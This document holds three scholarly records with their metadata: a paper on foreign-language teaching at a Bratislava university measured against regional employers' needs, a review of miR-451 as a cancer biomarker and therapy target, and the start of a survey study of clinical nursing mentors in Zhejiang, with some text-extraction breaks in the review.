We assume that English is most likely to be required at recruitment processes into international corporations in Bratislava.In the following part, the largest companies in Bratislava region will be confronted with their corporate languages.In this context, we consider a corporate language to be the language of the country where the company has its headquarters, or the country of origin.For the purpose of this paper, these corporations are viewed as potential employers.Our analysis is based on data from 2015, because relevant data from 2016 has not been published yet.The main criterion of companies' ranking is their revenue and the region -Bratislava.The data in Table 2 comes from the database of financial data (FinStat, 2017).Automotive industry Foreign Germany Source: Own processing according to the web site of Financial data database When analysing the largest companies in Bratislava region, we need to mention that, besides foreign companies, several Slovak state-owned enterprises belong to those with the highest revenue.British and American corporations also play a very important role.Among others, German companies hold an important position on the market as well.It is to be mentioned that these companies not only demonstrate the highest revenues, but are also employ the largest number of workers in Slovakia.Therefore, as already mentioned, they are likely to become employers of graduates from the UEBA.
Despite the fact that German is the second most often studied foreign language at the UEBA, we would highly recommend students to acquire at least basic knowledge of this language, since the amount of German and Austrian companies in the region indicates a need of being able to communicate in German.Due to the presence of not only German but also Austrian firms in Bratislava and surrounding areas, it is a great advantage to be capable of active communication in German.Knowledge of the German language may considerably increase one´s chances on the labour market.In combination with English, it is virtually a success factor.
Adamcová sums up the reasons for learning and using German in Slovakia as follows: Germany, Austria and Switzerland are the most important business partners of Slovakia; media from German-speaking countries are popular here, as well.Besides that, intercultural encounters between Slovakia and Germany have been occurring for a very long period of time, therefore it is not possible to imagine Slovak history without German presence (Adamcová, 2010, p. 41).We can also mention the geographical aspect, i.e. the proximity of Slovakia and the German-speaking countries in question.
We find it necessary to mention that the UEBA has entered into bilateral agreements with dozens of foreign universities and providers of higher education (e.g.within the Erasmus+ programme).The students may therefore choose from a variety of institution from all around Europe and thus improve their language competence.
Conclusion
The main intention of this paper was to analyse foreign languages being taught at the University of Economics in Bratislava in view of the labour market requirements.The primary research question was whether teaching foreign languages at this institution is efficient enough to prepare its students for a professional career, i.e. whether a graduate possesses language competences required by companies operating on the labour market in the region.
One of the main findings of our study was the dominance of English as a taught subject at the UEBA.However, such a result was even presupposed prior to the analysis initiation.The second most frequently foreign language chosen by the students was German, followed by Spanish and French.Next, we elaborated a list of the largest companies in Bratislava, and thus with regards to their revenues.Some of them are owned by the state; some of them also belong to the largest companies as far as the number of employees is concerned.
Out of the stated companies, approximately every third one is a German or an Austrian corporation.We suppose that the English language is required by most of the companies in the ranking, or it depends on the vacancy, respectively.Since it was proved that also German and Austrian companies belonged to the most significant ones, we would recommend students to attempt to acquire at least basic knowledge of German, besides other languages, as in Bratislava and the whole region it might be really advantageous.One way to do it is to apply for a mobility programme abroad, since the UEBA offers its students a number of opportunities to study in a foreign country.Many of them are under the auspices of the European Union, whose target is to support foreign language of its citizens.
On the other hand, the finding that German is the second most frequently taught language at the UEBA corresponds to the amount of companies from German speaking countries doing business in Bratislava.Therefore, we may conclude that the University takes into consideration the developments and trends on the labour market when elaborating the study curricula.Besides that, also students are likely to be aware of the added value, which German language brings.
The same methodology might be used also in the future to analyse foreign language competence and labour market requirements in other regions, or to analyse foreign language teaching at other universities and providers of higher education.We believe that situation on the labour market regarding required languages is always to be taken into consideration by those preparing study plans at various universities.
Figure 2 .
Figure 2. Development of youth unemployment in Slovakia and the EU in 2016 Source: Own processing according to Trading Economics / Eurostat
Table 1 Foreign languages taught at the University of Economics in Bratislava in the academic year 2013/2014 and respective numbers of students Summer semester 2013/2014 Winter semester 2013/2014 language FT enrolled FT active PT enrolled PT active FT enrolled FT active PT enrolled
Data provided by the Faculty of Applied Languages | 2018-12-29T18:32:04.840Z | 2017-11-11T00:00:00.000 | {
"year": 2017,
"sha1": "972a9b26949bf0018c6d0a77a17fdfc01fdc8621",
"oa_license": "CCBY",
"oa_url": "http://ae.fl.kpi.ua/article/download/94528/114218",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "972a9b26949bf0018c6d0a77a17fdfc01fdc8621",
"s2fieldsofstudy": [
"Linguistics",
"Education"
],
"extfieldsofstudy": [
"Political Science"
]
} |
209892548 | pes2o/s2orc | v3-fos-license | miR-451: A Novel Biomarker and Potential Therapeutic Target for Cancer
Abstract MicroRNAs (miRNAs) are endogenous, non-coding, single-stranded small RNAs involved in a variety of cellular processes, including ontogeny, cell proliferation, differentiation, and apoptosis. They can also function as oncogenes or tumor suppressor genes. Recent studies have revealed that miRNA-451 (miR-451) is involved in the regulation of various human physiological and pathological processes. Furthermore, it has been shown that miR-451 not only directly affects the biological functions of tumor cells but also indirectly affects tumor cell invasion and metastasis upon secretion into the tumor microenvironment via exosomes. Thus, miR-451 also influences the progression of tumorigenesis and drug resistance. This review summarizes the expression of miR-451 in various cancer types and the relationship between miR-451 and the diagnosis, treatment, and drug resistance of solid tumors. In addition, we address possible mechanisms of action of miR-451 and its potential application as a biomarker in the diagnosis and treatment of human cancers.
Introduction
Although great progress has been made in cancer treatments over the past several years, 1,2 the overall survival rates for some types of cancers are still very low owing to metastasis, recurrence, and drug resistance. Therefore, the identification of diagnostic molecular biomarkers for early cancer detection and the development of targeted treatments are crucial.
Increasing evidence has confirmed that noncoding RNAs (ncRNAs) participate in both physiological and pathological processes, including cell development, differentiation, proliferation, and apoptosis. MicroRNAs (miRNAs or miRs), a subtype of ncRNAs, are a class of small, endogenous, highly conserved, single-stranded noncoding RNAs of approximately 22 nucleotides. 3 They may function as oncogenes or tumor suppressor genes, depending on the cancer type and physiological environment. 4,5 More than 2500 mature miRNAs have been identified in the human genome and recorded in the public miRBase database. Among these, more than 1000 regulate over 50% of protein-coding human genes, and each miRNA can control up to 100 gene transcripts. A single miRNA may regulate gene expression at both the transcriptional and posttranscriptional levels by binding to the 3′ untranslated region of hundreds of target messenger RNAs (mRNAs). 6 The identification of downstream target mRNAs is a major focus of miRNA research. Epigenetic and genetic alterations of miRNAs are common events in cancer progression. Therefore, miRNAs have significant promise as diagnostic, prognostic, and therapeutic cancer biomarkers. [7][8][9][10] miR-451 was first identified in the human pituitary gland in 2005 by Altuvia et al 11 The gene encoding this miRNA is located in human chromosomal region 17qll.2. miR-451 participates in multiple physiological and pathological processes, including hematopoietic system differentiation, 12 embryonic development, epithelial cell polarity, 13, and nervous system development. 14 It is dysregulated in multiple cancers and participates in numerous cancer-related biological processes, including proliferation, apoptosis, angiogenesis, epithelial-mesenchymal transition (EMT), drug resistance, and metastasis. It often acts as a tumor suppressor gene in cancers and modulates multiple pathways by targeting different downstream mRNAs.
In this review, we focus on the function of miR-451 in multiple cancer types and its underlying mechanisms. More importantly, we will discuss the potential of miR-451 as a biomarker for early cancer diagnosis and as a therapeutic candidate for the treatment of metastatic or recurrent cancer and to overcome drug resistance.
miR-451 Function by Cancer Type
In recent years, researchers have begun to employ genechip and second-generation sequencing technologies to detect the expression of miR-451 in patient-derived tumor tissues and body fluids and cancer cell lines, which revealed that miR-451 expression differs between cancers as well as sample types (eg, blood, saliva, or urine). miR-451 acts as a tumor suppressor gene in most cancer types, whereas in appendiceal mucinous cystadenocarcinoma 15 and pancreatic cancer, 16,17 it acts as an oncogene.
miR-451 and Lung Cancers
Lung cancer is the most common cancer type and the leading cause of cancer mortality worldwide, accounting for 12% of the total cancer cases and 18% of the total cancer deaths in 2018. 18 Lung cancers are classified as small-cell lung carcinoma (SCLC) or non-small-cell lung carcinoma (NSCLC), which accounts for approximately 85% of all lung cancers. In 2011, Wang et al 19 reported that miR-451 was the most strongly downregulated miRNA in 23 matched normal and NSCLC tumor tissues and that low miR-451 expression was correlated with poor tumor differentiation, advanced pathological stage, lymph-node (LN) metastasis, and shorter overall survival. Overexpression of miR-451 by transfection with a miR-451 mimic triggered apoptosis and inhibited proliferation in NSCLC cell lines by directly targeting RAB14, a member of the RAS oncogene family of small GTPases. Mechanistically, miR-451 was reported to suppress cell proliferation and metastasis by targeting the inflammatory factors PSMB8/NOS2 in A549 cells. 20 Other investigators have verified these results in additional lung cancer tissues. 21,22 The link between low miR-451 expression and poor prognosis for NSCLC has been investigated by Goto et al,22 who found that renewed expression of miR-451 led to suppression of macrophage migration inhibitory factor (MIF) and phosphorylated Akt expression, as well as cell proliferation and migration in NSCLC cell lines. In addition, miR-451 was found to selectively promote sensitivity to cisplatin in ERCC1-high NSCLC cells by targeting the Wnt/βcatenin and PI3K/AKT pathways. 23 These results support the role of miR-451 as a tumor suppressor in lung cancer.
miR-451 and Digestive System Cancers
Hepatocellular carcinoma (HCC) is the most common aggressive carcinoma of the liver and the third-ranking contributor to tumor-associated death worldwide. 24 Li et al 25 found that miR-451 was markedly downregulated in HCC cells and tissues and functions as a tumor suppressor in HCC. They further verified that IKK-β is an important mediator of NF-κB activation in response to miR-451 inhibition in HCC. Global microarray-based miRNA expression profiling of 12 pairs of matched HCC and non-HCC tissues revealed that miR-451 is involved in hepatitis B virus-unrelated HCC. 26 miR-451 in HCC tissues is significantly correlated with advanced clinical stage, metastasis, and reduced diseasefree and overall survival. 27 The same study revealed that activation of Erk1/2 signaling can mediate miR-451/c-Mycinduced EMT and metastasis in HCC cells by regulating the expression of EMT-related and MMP family proteins. In 2004, it was discovered that miR-451 can inhibit the migratory ability of hepatoma cell lines by targeting ATF2. 28 Furthermore, miR-451 is downregulated in multiple HCC cell lines and negatively regulates cell growth and invasion in a caspase-3-and MMP-9-dependent manner. Liu et al 29 further showed that miR-451 may act as a tumor suppressor in HCC by antagonizing angiogenesis through directly targeting the IL-6R-STAT3-VEGF pathway.
Colorectal cancer (CRC) is the third most common type of cancer worldwide. 30 Xu et al 31 evaluated 20 CRC tumor and adjacent non-cancerous tissues by microarray analysis. They found that miR-145, miR-451, and miR-1 were significantly downregulated in the tumor tissues. Another group found that miR-451 expression was downregulated in CRC tissues and was negatively correlated with the Dukes stage. 32 In-vitro and in-vivo studies revealed that miR-451 may inhibit colon cancer growth by directly targeting Ywhaz and indirectly regulating nuclear FoxO3 accumulation. 32 In 2013, Li and colleagues reported that miR-451 inhibits CRC cell growth by downregulating the P13K/AKT pathway. 33 Others discovered that miR-451 suppresses cell growth by downregulating the expression of its target gene IL6R in the CRC cell line RKO. 34 In 2017, Mamoori et al 35 analyzed 70 matched cancerous and non-cancerous fresh-frozen tissues of patients with CRC (35 men and 35 women) who underwent resection of colorectal adenocarcinoma. They noticed that miR-451 was downregulated in the majority of the CRC tissues. Downregulation of miR-451 correlated significantly with the presence of coexisting adenoma and cancer persistence or recurrence after surgery. The authors further confirmed that miR-451 has a tumor-suppressing role in CRC by targeting MIF.
Gastric cancer (GC) is the second most frequently diagnosed cancer in the world, particularly in eastern Asia. 36 As early-stage GC is difficult to detect, patients often are in an advanced stage of the disease at diagnosis. The recurrence rate in patients with highly aggressive cancer subtypes at an advanced stage is as high as 70%, even after successful complete resection. Su et al 37 studied 107 paired human primary gastric tumor and adjacent normal tissues and GC cell lines. They reported low miR-451 expression in the GC tissues and cell lines and that downregulation of miR-451 tended to be positively correlated with lymphatic metastasis, TNM stage, advanced clinical stage, and shorter overall survival in patients with GC. Shen et al 38 confirmed that miR-451 is positively correlated with tumor stage, lymphatic metastasis, and shorter overall survival in patients with GC and suggested downregulation of miR-451 as a diagnostic and prognostic biomarker in GC. Similar results have also been reported based on the investigation of tumor tissues and the clinicopathological features of 180 patients with GC. 37,39 Esophageal cancer (EC) is one of the most aggressive tumors in the gastrointestinal system and is the sixth most common cause of cancer mortality. 40 In 2012, Wang et al 41 reported that increased miR-451 expression induced apoptosis and suppressed cell proliferation, invasion, and metastasis by activating the PI3K/AKT pathway in EC9706 cells. By screening peripheral blood samples of 78 patients with esophageal cancer and 23 healthy donors, Hui et al 42 found that miR-451 and miR-129 expression levels did not increase significantly over those in normal controls in early-stage esophageal squamous cell cancer (ESCC), but significantly increased at stages III and IV. The relative expression of miR-451 alone allowed diagnosis of EC with a sensitivity of 83% and a specificity of 79%. Zang et al 43 found that decreased miR-429 and miR-451 levels were associated with the occurrence of lymph node metastases as well as the differentiation status and TNM stage in ESCC by using miRNA microarray chip analysis of 53 pairs of primary ESCC tissues and corresponding adjacent normal esophageal tissues. Zang et al 44 reported that miR-451 inhibits the proliferation of EC9706 cells by targeting CDKN2D and MAP3K1.
miR-451 and Urinary System Cancers
Bladder carcinoma is the second leading cause of death by urologic cancer among men and is characterized by multiple lesions with a high recurrence rate. In 2012, Xie et al 45 performed gene-chip screening of 14 invasive and three non-invasive bladder urothelial carcinoma tissue samples as well as four bladder cancer cell lines. They discovered that miR-451 was downregulated in the infiltrating bladder urothelial carcinoma group, suggesting that low expression is associated with infiltration and metastasis of bladder urothelial carcinoma. Another group found significantly higher downregulation of miR-451 in bladder cancer tissues than in paracancerous tissues, and miR-451expression was significantly associated with histological differentiation degree and TNM stage. 46 miR-451 expression maintains bladder tumor cells in an epithelial phenotype and inhibits EMT, thereby reducing their invasion and migration. Wang et al 47 also showed higher downregulation of miR-451 in bladder cancer tissues than in adjacent noncancerous bladder tissues and suggested that miR-451 is a tumor suppressor that regulates the migration and invasion of bladder cancer cells by directly targeting c-Myc.
Renal-cell carcinoma (RCC) is the most common cancer of the adult kidney, the incidence and mortality rates of which have increased by 2-3% per decade over the past 20 years. In 2010, Heinzelmann et al 48 performed RT-PCR analysis of miRNA expression in 30 human RCC tissues, including 10 non-metastatic tumors, four tumors of patients with metastasis three years after diagnosis or later, and four tumors of patients with primary metastasis. They identified 12 miRNAs that were strongly downregulated in metastatic RCC, including miR-451. These findings prompted further research on the role of miR-451 in metastatic RCC. It was found to be downregulated in RCC tissues and cell lines, and miR-451 downregulation was correlated with a lower survival rate of patients with RCC. 49 Upregulation of miR-451 expression inhibited the growth of RCC cells and induced apoptosis by targeting its downstream gene, PSMB8. 49
miR-451 and Female Reproductive System Cancers
Ovarian cancer (OC) is the most lethal gynecologic malignancy in the world. 50 In 2014, Ling et al 51 analyzed 115 epithelial OC and 34 normal ovarian tissues and showed that miR-451 was downregulated in epithelial OC. Low levels of miR-451 were associated with advanced FIGO stage, high serum CA-125 levels, and LN metastasis, and miR-451 independently predicted poor prognosis for patients with epithelial OC. A study of nineteen paired cases of OC and endometriosis foci revealed that the expression levels of miR-1, miR-133a, and miR-451 were significantly reduced in ovarian tumors. 52 Cervical cancer is the fourth-leading cause of cancer deaths in women worldwide. In 2008, Martinez et al 53 reported that miR-451 expression was lower in cell lines containing human papilloma virus-16 and/or −18 DNA than in normal cervical cells. miR-451 expression was higher in the multidrug resistant (MDR) human cervical cancer cell line KB-3-1 than in its parental cell line KB-V1, and miR-451 antagomirs decreased P-glycoprotein expression and increased doxorubicin sensitivity in MDR cancer cells. 54 In 2018, Yang et al 55 reported that miR-451 is differentially expressed in different stages of cervical squamous cell carcinoma.
miR-451 and Endocrine Cancers
Breast cancer (BC) is one of the most common malignancies among women, and its incidence is increasing. 56 Early detection is essential for effective treatment and survival. Despite recent advances in early diagnostic methods, metastasis remains the leading cause of death in patients with BC. The current treatment regimen for BC is multimodal, including surgery, chemotherapy, radiotherapy, hormonal treatment, and targeted therapy. Wang et al 57 analyzed 73 invasive, ductal BC tissue samples with or without LN metastasis and found that miR-451 was upregulated in the LN metastasis group. Al-Khanbashi et al 58 analyzed 72 tissue samples and 108 serum samples from 9 and 27 patients with BC, respectively, and showed that tissue miR-451 was upregulated and significantly associated with the pathological stage. They also found that serum miR-451 levels significantly decreased during treatment, and higher serum levels were associated with improved clinical and pathological responses and diseasefree survival. In 2019, Shao et al 59 analyzed plasma samples from 143 patients with BC receiving solo or combination docetaxel chemotherapy and found that miR-451 expression was significantly higher in the sensitive group (partial response and stable disease) than in the resistant group.
Thyroid cancer is the most common human endocrine malignancy, accounting for 95% of all endocrine tumors. In 2013, Wang et al 60 conducted a miRNA microarray analysis of samples from patients with papillary thyroid cancer with/without LN metastasis and showed that miR-451 was upregulated in the LN group. In addition, miR-2861 and miR-451 levels were significantly greater in lateral than in central LN metastases. They also revealed that miR-2861 and miR-451 are unique miRNAs associated with the prognosis and progression of thyroid cancer.
Pancreatic carcinoma is typically asymptomatic at early stages, and the disease becomes apparent only at an advanced stage, with extensive local tumor invasion to surrounding tissues or distant organs. In 2012, Ali et al 16 found that miR-451 was significantly elevated in pancreatic carcinoma tissues. A study by Guo et al 17 indicated that miR-451 was significantly overexpressed in pancreatic cancer tissues and cell lines, and elevated miR-451 expression was associated with improved cell viability both in vitro and in vivo. Further, these authors showed that in pancreatic cancer, a high level of miR-451 is closely linked to poor prognosis and lymphatic metastasis, and miR-451 acts by directly targeting CAB39.
miR-451 and Head and Neck Cancer
Nasopharyngeal carcinoma is a common head and neck cancer derived from the epithelium of the nasopharynx. Liu et al 61 found that miR-451 was significantly downregulated in nasopharyngeal carcinoma cell lines and clinical tissues. Patients with low miR-451 expression had poorer overall survival and disease-free survival than patients with high expression, indicating that miR-451 is an independent prognostic factor in nasopharyngeal carcinoma. In 2010, Hui et al 62 first identified miR-451 as the only significantly overexpressed miRNA (by 4.7-fold) in non-relapsed compared with relapsed patients with locally advanced head and neck squamous cell carcinoma.
Glioblastoma multiforme is the most common primary neoplasm of the central nervous system diagnosed at WHO grade IV and has the highest malignancy and mortality rates even with the current standard treatment. Multiple studies have supported the role of miR-451 in the regulation of glioblastoma multiforme via different pathways. Nan et al 63 reported that miR-451 was downregulated in the human glioblastoma cells A172, LN229, and U251 and that renewed expression of miR-451 had dramatic effects on the three cell lines, inhibiting cell growth, inducing G0/G1 phase arrest, and increasing cell apoptosis, perhaps via regulation of the PI3K/AKT signaling pathway. Godlewski et al 64 found that the miR-451 level decreased in low glucose conditions, slowing proliferation, but enhancing migration and survival in glioblastoma cell lines by regulating its downstream target CAB39, which can bind LKB1, a marker in the LKB1/ AMPK pathway. In glioblastoma patients, elevated miR-451 is associated with shorter survival. As a regulator of the LKB1/AMPK pathway, it may crucially contribute to cellular adaptation in response to altered energy availability. 64 In 2017, Zhao et al 65 also noted that miR-451 expression was lower in glioma than in control brain tissues, especially in the central parts of the tumor. They found that decreased miR-451 expression suppressed tumor cell proliferation but enhanced migration, which was accompanied by low-level CAB39/AMPK/mTOR pathway activation and strong Rac1/cofilin pathway activation, in glioma cell lines.
miR-451 and Osteosarcoma
Osteosarcoma (OS) is the most common primary bone tumor in adolescents and young adults and is associated with a poor prognosis owing to its high malignant and metastatic potential. In 2012, Namløs et al 66 In addition to the above-mentioned cancers, miR-451 has been reported to be dysregulated in other cancer types. miR-451 expression in solid tumors and the pathways it is involved in are summarized in Table 1 and Figure 1.
miR-451 in Cancer Diagnosis
Biomarkers are biological indicators that can be used for early detection, to define tumor subtypes, or to predict disease outcome. A desirable biomarker requires a certain sensitivity and specificity. It should be easily accessible, so that it can be easily detected in samples obtained noninvasively, such as blood, saliva, and/or urine. 74 The abnormal miR-451 expression observed in various cancer types indicates its potential as a novel cancer biomarker ( Table 2).
Zhu et al 75 identified five miRNAs (miR-16, miR-25, miR-92a, miR-451, and miR-486-5p) that showed consistently elevated levels in the plasma of patients with GC and provided high diagnostic accuracy for early-stage noncardia gastric adenocarcinoma. In 2012, Konishi et al 76 screened the plasma of pre-and post-operative patients with GC and found that nine miRNAs were significantly reduced in post-operative patients. In validation experiments, miR-451 and miR-486 were found to be decreased in post-operative plasma in 90% and 93% of patients, respectively, suggesting that they could be useful as bloodbased biomarkers to screen for GC. Brenner et al 77 identified miR-451, miR-199a-3p, and miR-195 as predictive biomarkers for GC recurrence; miR-451 had the strongest prognostic effect. Redova et al 78 Shivapurkar et al 86 analyzed the expression of circulating miRNAs in the sera of patients with CRC diagnosed at an early stage before surgery. Six miRNAs (miR-15a, miR-103, miR-148a, miR-320a, miR-451, and miR-596) could be used to predict the risk of recurrence in early CRC. Phua et al 87 found that fecal miR-451 had a sensitivity of 88% and specificity of 100% in detecting CRC.
Ji et al 88 used RT-PCR to analyze the serum samples of 31 patients with OC, 23 patients with benign ovarian tumors, and eight control subjects and identified four miRNAs (miR-22, miR-93, miR-106b, and miR-451) that could be used to distinguish between samples from patients with OC and those from healthy controls.
These data indicate that the abnormal expression of miR-451 is associated with the cancer disease state and that miR-451 has great clinical potential as a noninvasive diagnostic biomarker for numerous human cancers.
miR-451 in Cancer Therapy
Adjuvant therapy such as chemotherapy or radiotherapy is used before, after, or along with the primary surgery to increase its efficiency and improve disease management. Therapy resistance currently is a major obstacle in oncology.
DovePress
Recent research has suggested that abnormal miRNA expression is associated with therapy resistance. 89 Numerous preclinical trials have shown that miRNAs can influence the sensitivity of tumors to traditional antitumor therapies by using effective delivery strategies such as chemical modification, viral-based carriers, non-viral carriers, and exosomes. 2 Increasing evidence has demonstrated an important role for miR-451 in the regulation of therapy resistance ( Figure 2).
Chemoresistance
In lung cancer, Bian et al 90 Gu et al 94 first investigated the potential influence of miR-451 in drug resistance in BC by using a paclitaxelresistant BC cell line. They then measured the expression of circulating miR-451 in patients with BC undergoing neoadjuvant chemotherapy and found that the relative expression levels were significantly lower in the neoadjuvant chemotherapy-resistant group than in the sensitive group, and miR-451 expression in these two groups was significantly lower than that in the healthy control group. These results indicate the potential application of circulating miR-451 in predicting resistance to neoadjuvant chemotherapy in BC. Wang et al 62 showed in vitro and in vivo that miR-451 may be an important potential target in paclitaxelresistant BC and acts through targeting Ywhaz. Pigati and his team 95 found that increased miR-451 and miR-1246 levels in the blood, milk, and ductal fluids indicate the presence of abnormal cells in the mammary gland that render MCF7 cells more sensitive to doxorubicin.
In 2008, Zhu et al 54 first reported that miR-451 can regulate drug resistance mediated by MDR-1/P-glycoprotein in OC and cervical cancer cell lines. In RCC, Sun et al 96 explored Surprisingly, miR-451 is also related to cell metabolism and can mediate cell energy-consuming models via several targets. Ansari et al 107 found that miR-451 levels in glioblastoma multiforme cancer cells were high in a glucose-rich environment and low in conditions of glucose depletion, and that miR-451 is a potent inhibitor of the AMPK signaling pathway. Zhao et al 65 demonstrated that miR-451 is downregulated in glioma tissues compared to normal brain tissues, especially in the central portions of tumors, indicating that the microenvironment inside the tumor is heterogeneous. Central glioma cells are in a hypoxic-hypoglycemic microenvironment with low miR-451 expression; therefore, tumor cell growth inhibited and necrosis is apparent. In the peripheral parts of the tumor, the survival of tumor cells is enhanced, and they actively proliferate and infiltrate into the surrounding parenchyma. In glioma cell lines, decreased miR-451 expression suppressed tumor cell proliferation but enhanced migration, concomitant with low level CAB39/AMPK/mTOR pathway activation and strong Rac1/cofilin pathway activation, respectively. Korabecna et al 108 identified five miRNAs derived from cancer cells, including miR-451, that may together regulate 2304 target genes in macrophages, including those involved in cell apoptosis, gene expression, and protein transportation, that may contribute to carcinogenesis. In 2018, Panigrahi et al 2 showed that miR-451 levels were significantly higher in exosomes from human prostate cancer cells under hypoxic conditions than in those under normoxic conditions. These results suggest the potential of miR-451 as a biomarker that influences the tumor microenvironment in patients with prostate cancer.
Conclusion
In this review, we focused on the functions of miR-451 in the progression of multiple cancer types. miR-451 functions as a tumor suppressor and is downregulated in most cancer types. It can be detected in different sample types, such as cancer tissues, blood, saliva, and urine. miR-451 has been associated with multiple target genes and pathways. It functions in both direct and indirect ways. The indirect way via secretion into the tumor microenvironment through exosomes overcomes miRNA degradation by RNase in the serum and endocytic compartments. miR-451 has potential as a biomarker for cancer diagnosis and prognosis or as a treatment target in combination with established drugs to reduce drug resistance. However, its clinical application has a long way to go.
Publish your work in this journal
OncoTargets and Therapy is an international, peer-reviewed, open access journal focusing on the pathological basis of all cancers, potential targets for therapy and treatment protocols employed to improve the management of cancer patients. The journal also focuses on the impact of management programs and new therapeutic agents and protocols on patient perspectives such as quality of life, adherence and satisfaction. The manuscript management system is completely online and includes a very quick and fair peer-review system, which is all easy to use. Visit http://www.dovepress.com/ testimonials.php to read real quotes from published authors. | 2019-12-19T09:18:17.774Z | 2019-12-16T00:00:00.000 | {
"year": 2019,
"sha1": "72d03c2f9993e5915ccac8ff01a450d8fa10f06f",
"oa_license": "CCBYNC",
"oa_url": "https://www.dovepress.com/getfile.php?fileID=54761",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "e907b2d0922951c437e42620c349cc270fbc1311",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine",
"Biology"
]
} |
267318170 | pes2o/s2orc | v3-fos-license | Clinical nursing mentors’ motivation, attitude, and practice for mentoring and factors associated with them
Objective To investigate the motivation, attitude, and practice toward mentoring and related factors among clinical nursing mentors. Methods This cross-sectional study included clinical nursing mentors from 30 hospitals in Zhejiang Province between August and September 2023. Demographic information, motivation, attitude, and practice were collected through a self-administered questionnaire. Results A total of 495 valid questionnaires were collected, and most of the participants were 30–39 years old (68.7%). Average motivation, attitude, and practice scores were 29 [26, 32] (possible range: 8–40), 87 (82, 94) (possible range: 22–110), and 41 (38, 45) (possible range: 11–55), respectively. Correlation analyses showed that the motivation scores were positively correlated with attitude scores (r = 0.498, P < 0.001) and practice scores (r = 0.408, P = 0.001), while attitude scores were positively correlated with practice scores (r = 0.554, P < 0.001). Multivariate logistic regression showed that intermediate and senior nursing mentors (OR = 0.638, 95% CI: [0.426–0.956], P = 0.030) and different hospitals (OR = 1.627, 95% CI: [1.054–2.511], P = 0.028) were independently associated with motivation. The hospital’s frequency of psychological care was a significant factor associated with nursing mentoring motivation, attitude, and practice. Participation in training (OR = 2.908, 95% CI: [1.430, 5.913], P = 0.003) and lower frequency of job evaluation in hospital (“Often”: OR = 0.416, 95% CI: [0.244–0.709], P = 0.001 and “Sometimes”: OR = 0.346, 95% CI: [0.184–0.650], P = 0.001) were independently associated with practice. Conclusion Clinical nursing mentors had adequate motivation, positive attitude, and proactive practice towards mentoring and associated factors. Clinical nursing mentorship should be enhanced by prioritizing mentor training, fostering a supportive environment with consistent psychological care, and promoting structured mentorship activities. Supplementary Information The online version contains supplementary material available at 10.1186/s12912-024-01757-8.
Background
By assisting nursing students through inquiry and offering guidance and feedback on patient-centered clinical learning, faculty members have a vital role in fostering their development and achievement in extracurricular activities beyond traditional classroom settings [1].These extracurricular activities serve as a gateway through which faculty can introduce students to various clinical practices, nursing research, educational experiences, and service-related opportunities, including tutoring and committee involvement [2,3].However, the existing approach to assigning mentoring responsibilities in China predominantly relies on objective criteria, such as qualifications, skills, and organizational considerations, with limited emphasis on the mentor's motivation and willingness, which may inadvertently lead to mentors not fully engaging in their roles, suboptimal mentoring outcomes and potential nurse attrition concerns [4].
In order to gain a deeper understanding of the mentors' motivation, attitudes, and practices, it is essential to consider various psychological and sociological theories.The Psychological Needs Motivation Theory posits that individual behaviors are typically influenced by intrinsic and extrinsic motivations [4], allowing us to gain insights into how mentors' internal needs impact their willingness to assume mentoring responsibilities.On the other hand, Social Exchange Theory asserts that an individual's social behaviors are shaped by economic and social exchanges [5].This theory aids in explaining the dynamics of interactions and relationships between mentors and apprentices and how these factors influence the mentor's attitudes and behaviors.The Theory of Planned Behavior focuses on individual decision-making processes and can be applied to analyze the mentor's thought process when making mentoring-related decisions [6].These psychological and sociological theories have a significant role in comprehensively understanding and elucidating mentors' motivation, attitudes, and practices.
Individual willingness is pivotal for harnessing an individual's subjective initiative and enhancing the quality of mentoring [7,8].Therefore, a profound understanding of mentors' willingness and influencing factors is crucial for enhancing the effectiveness of mentoring.This study explored the motivation, attitude, and practice of clinical nursing mentors and the factors associated with these aspects.The ultimate objective was to help organizations establish motivation mechanisms for nursing mentors, which, in turn, could foster their enthusiasm for mentoring, enhance the effectiveness of nurse apprenticeship programs, and provide practical insights for nursing human resource development and the advancement of the nursing profession.
Study design and participants
This cross-sectional survey included clinical nursing mentors from 30 hospitals in Zhejiang Province between August and September 2023.Inclusion criteria were the following: (1) the mandatory qualifications to practice as a nurse; (2) competent in mentoring newly recruited or practical nurses; (3) used to mentor new nurses/interns nurses; and (4) willingly consented to participate in the survey study.Exclusion criteria were the following: (1) submission of incomplete information; (2) selection of identical options for an entire section of the questionnaire; (3) completion of the questionnaire in < 120 s or > 60 min; (4) no experience as a clinical nursing mentor; and (5) instances of duplicate IP data.
The study was ethically approved by the Medical Ethics Committee of Ningbo College of Health Sciences.Before participating, all participants were provided detailed information about the study's purpose and content and signed an informed consent.Emphasis was placed on the confidentiality of their responses, assuring them that their personal data would be securely handled and used exclusively for research purposes.Informed consent was obtained from each participant, ensuring that only those who understood and agreed to these terms were included in the analysis.
Questionnaire introduction
The questionnaire was designed following established guidelines and pertinent literature.Subsequently, feedback was solicited from a panel of 10 senior clinical nursing and nursing education experts, encompassing individuals holding professional titles ranging from Chief Nursing Officer to Associate Professors and Professors.Their expert insights were used to effectuate refinements and incorporate their feedback into the questionnaire.These revisions involved enhancements to question wording and options to ensure better alignment with real-world clinical scenarios.
The experts suggested including more relevant elements to further elucidate the factors affecting mentoring motivation.These elements were the following: [1] whether hospitals offered training on teaching skills for mentors, [2] how the hospital evaluated mentoring work, and [3] the impact of mentoring apprentices on the mentor's nursing duties.These recommendations were carefully incorporated to enhance the comprehensiveness and relevance of the questionnaire.
The questionnaire was subsequently administered in a single small-scale distribution, yielding 48 completed copies and demonstrating robust internal consistency with a Cronbach's α coefficient of 0.904.The reliability of different dimensions was also strong: Cronbach's α coefficient of motivation, attitude, and practice dimension were 0.833, 0.873, and 0.616, respectively, indicating good internal consistency across all sections.As a result, no adjustments were made to the questionnaire.The final questionnaire encompassed four dimensions, i.e., demographic information (including education, gender, institutional nature, professional title, and institutional support for mentoring work), motivation dimension, attitude dimension, and practice dimension, totaling 61 questions.
